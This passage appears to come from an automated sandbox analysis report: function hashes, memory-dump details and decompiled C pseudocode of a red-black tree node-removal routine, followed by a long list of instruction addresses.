Opcode ID: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
Instruction ID: 0ff0364cf6be1368c5f4b291029ae6b5cbfe5ea2986cd3c38f085d2a96d73519
Opcode Fuzzy Hash: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
Instruction Fuzzy Hash: 06021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 00408C70, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00408F8C

Memory Dump Source

Source File: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: f1d44c302487b103660306cd6987bb60b95c699b99aa7ff381766033f9a4755f
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 6E022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 00B3F900, Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00B3F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x00b3f90b
0x00b3f911
0x00b3f917
0x00b3f919
0x00b3f91c
0x00b95d63
0x00b95d69
0x00b95d69
0x00b95d63
0x00b3f922
0x00b3f927
0x00b95d72
0x00b95d78
0x00b95d78
0x00b95d72
0x00b3f92d
0x00b3f931
0x00b3fa2d
0x00b3fa2d
0x00b3f939
0x00b3f940
0x00b3f944
0x00b3fa37
0x00b3fa39
0x00b3fa3c
0x00b3fa3e
0x00b3fa41
0x00b3fa48
0x00b3fe68
0x00b3fe6c
0x00b3fe6c
0x00b3fe78
0x00b3fe78
0x00b3fe7a
0x00b3fe7a
0x00b3fe7e
0x00b3fe6e
0x00b3fe6e
0x00b3fe72
0x00000000
0x00000000
0x00000000
0x00b3fe80
0x00b3fe80
0x00b3fe83
0x00000000
0x00b3fe83
0x00b95d7f
0x00b95d81
0x00000000
0x00000000
0x00b95d87
0x00000000
0x00b95d87
0x00b3fa4e
0x00b3fa50
0x00b95d90
0x00000000
0x00000000
0x00b95d98
0x00b3fa58
0x00b3fa58
0x00b3fa5d
0x00b3fa60
0x00b3fa63
0x00b3fa69
0x00b3fa6b
0x00b3fa6e
0x00b3fa71
0x00b95da1
0x00b95da7
0x00b95da7
0x00b95da1
0x00b3fa79
0x00b40071
0x00b40073
0x00b40074
0x00000000
0x00b3fa7f
0x00b3fa83
0x00b3fa85
0x00b95dae
0x00b95dae
0x00b3fa8b
0x00b3fa8f
0x00b3fa98
0x00b3faa1
0x00b3faa4
0x00b3faa6
0x00b3faa9
0x00b3faac
0x00b95db7
0x00b95dbd
0x00b95dbd
0x00b95db7
0x00b3fab4
0x00000000
0x00b3faba
0x00b3fabc
0x00b3fac2
0x00b3fac5
0x00b3fac7
0x00b3fac7
0x00b3fad6
0x00b3fad9
0x00b3fadf
0x00b3fae2
0x00b3fae4
0x00b3fae7
0x00b3faea
0x00b3faed
0x00b95dc4
0x00b95dc9
0x00000000
0x00000000
0x00b95dcf
0x00b3faf6
0x00b3fafa
0x00b3fafc
0x00b3fafc
0x00b3fafe
0x00b3fb01
0x00b3fb09
0x00b3fb0c
0x00b3fb12
0x00b3fb14
0x00b3fb17
0x00b95dd6
0x00b95dd9
0x00b95dde
0x00000000
0x00000000
0x00b95de4
0x00b95de7
0x00b3fb29
0x00b3fb2c
0x00b95df3
0x00b95df6
0x00b95e06
0x00b95e0c
0x00b95e0f
0x00b95e11
0x00000000
0x00b95e1f
0x00000000
0x00b95e1f
0x00b95e11
0x00b95df8
0x00b95dfb
0x00b95e00
0x00000000
0x00000000
0x00b95e02
0x00000000
0x00b95e02
0x00b3fb32
0x00b3fb35
0x00b3fb3c
0x00b95e26
0x00b95e28
0x00b95e28
0x00b95e2e
0x00b95e3c
0x00b95e3c
0x00b95e2e
0x00b3fb45
0x00b3fb47
0x00b3fb53
0x00b3fb56
0x00b3fb59
0x00b3fb5c
0x00b3fb65
0x00b4000d
0x00000000
0x00b4000f
0x00b4000f
0x00000000
0x00b4000f
0x00b3fb6b
0x00b3fb6e
0x00b3fb71
0x00b3fb73
0x00b3fb76
0x00b95e45
0x00b95e4b
0x00b95e4b
0x00b95e45
0x00b3fb80
0x00b3fb83
0x00b95e54
0x00b95e5a
0x00b95e5a
0x00b95e54
0x00b3fb89
0x00b3fb98
0x00b3fb9b
0x00b3fb9e
0x00b3fba0
0x00b95e63
0x00b95e69
0x00b95e69
0x00b95e63
0x00b3fba8
0x00000000
0x00b3fbae
0x00b3fbb2
0x00b95e70
0x00b3fbb8
0x00b3fbb8
0x00b3fbb8
0x00b3fbbd
0x00b3fbbf
0x00b3fbbf
0x00b3f9a8
0x00b3f9a8
0x00b3f9ad
0x00b3f9b4
0x00b95eda
0x00000000
0x00000000
0x00b95ee2
0x00b3f9bc
0x00b3f9bc
0x00b3f9bf
0x00b3f9c4
0x00b3fde6
0x00b3fde9
0x00b3fdec
0x00b3fdef
0x00b3fdf2
0x00b95eeb
0x00b95ef1
0x00b95ef1
0x00b95eeb
0x00b3fdfa
0x00000000
0x00b3fe00
0x00b3fe04
0x00b95efa
0x00b95f00
0x00b95f00
0x00b95efa
0x00b3fe0a
0x00b3fa24
0x00b3fa2a
0x00b3fa2a
0x00b3fdfa
0x00b3f9cd
0x00000000
0x00b3f9cf
0x00b3f9cf
0x00b3f9d1
0x00b3f9d4
0x00b3f9d7
0x00b3f9d9
0x00b3f9dc
0x00b3f9df
0x00b3f9e2
0x00b3f9e7
0x00b95f09
0x00000000
0x00000000
0x00b95f11
0x00b3f9ef
0x00b3f9f3
0x00b3fed5
0x00b3fed8
0x00b3fedb
0x00b95f1a
0x00b95f20
0x00b95f20
0x00b95f1a
0x00b3fee3
0x00000000
0x00b3fee9
0x00b3feeb
0x00b95f29
0x00b95f2f
0x00b95f2f
0x00b95f29
0x00b3fef3
0x00000000
0x00b3fef9
0x00b3fefc
0x00b3ff01
0x00b95f38
0x00b40052
0x00b40054
0x00000000
0x00b40056
0x00b40056
0x00b3ff40
0x00b3ff42
0x00b95f6e
0x00b95f74
0x00b95f74
0x00b95f6e
0x00b3ff50
0x00b3ff56
0x00b3ff5b
0x00b95f7d
0x00000000
0x00000000
0x00b95f83
0x00000000
0x00b3ff61
0x00b3ff61
0x00b3ff63
0x00b40021
0x00b40026
0x00b4002b
0x00b4007e
0x00b40080
0x00b40080
0x00b4007e
0x00b4002f
0x00000000
0x00b40031
0x00b40033
0x00b40086
0x00b40035
0x00b40035
0x00b40035
0x00b4003c
0x00000000
0x00b4003c
0x00b4002f
0x00b3ff69
0x00b3ff6b
0x00b95f8c
0x00b95f92
0x00b95f92
0x00b95f8c
0x00b3ff74
0x00b3ff77
0x00b3ff7b
0x00b95f99
0x00b95f9b
0x00b3ff81
0x00b3ff81
0x00b3ff83
0x00b3ff83
0x00b3ff88
0x00b3ff8b
0x00b3ff90
0x00b3ff92
0x00b3ff92
0x00b3ff9c
0x00b3ffa2
0x00b3ffa6
0x00b3ffaa
0x00b3ffad
0x00b3ffb2
0x00b95fa4
0x00b95faa
0x00b95faa
0x00b95fa4
0x00b3ffb8
0x00000000
0x00b3ffb8
0x00b3ff5b
0x00b40054
0x00b95f3e
0x00b95f3e
0x00b3ff09
0x00000000
0x00000000
0x00b3ff0f
0x00b3ff14
0x00b95f47
0x00b95f4d
0x00b95f4d
0x00b95f47
0x00b3ff1c
0x00b40046
0x00b40076
0x00b40078
0x00000000
0x00b40048
0x00b40048
0x00b4004a
0x00b4004a
0x00000000
0x00b4004a
0x00b3ff22
0x00b3ff22
0x00b3ff26
0x00b95f56
0x00b95f5c
0x00b95f5c
0x00b95f56
0x00b3ff2e
0x00000000
0x00b3ff34
0x00b3ff36
0x00b95f65
0x00b3ff3c
0x00b3ff3c
0x00b3ff3c
0x00b3ff3e
0x00000000
0x00b3ff3e
0x00b3ff2e
0x00b3ff1c
0x00b3fef3
0x00b3fee3
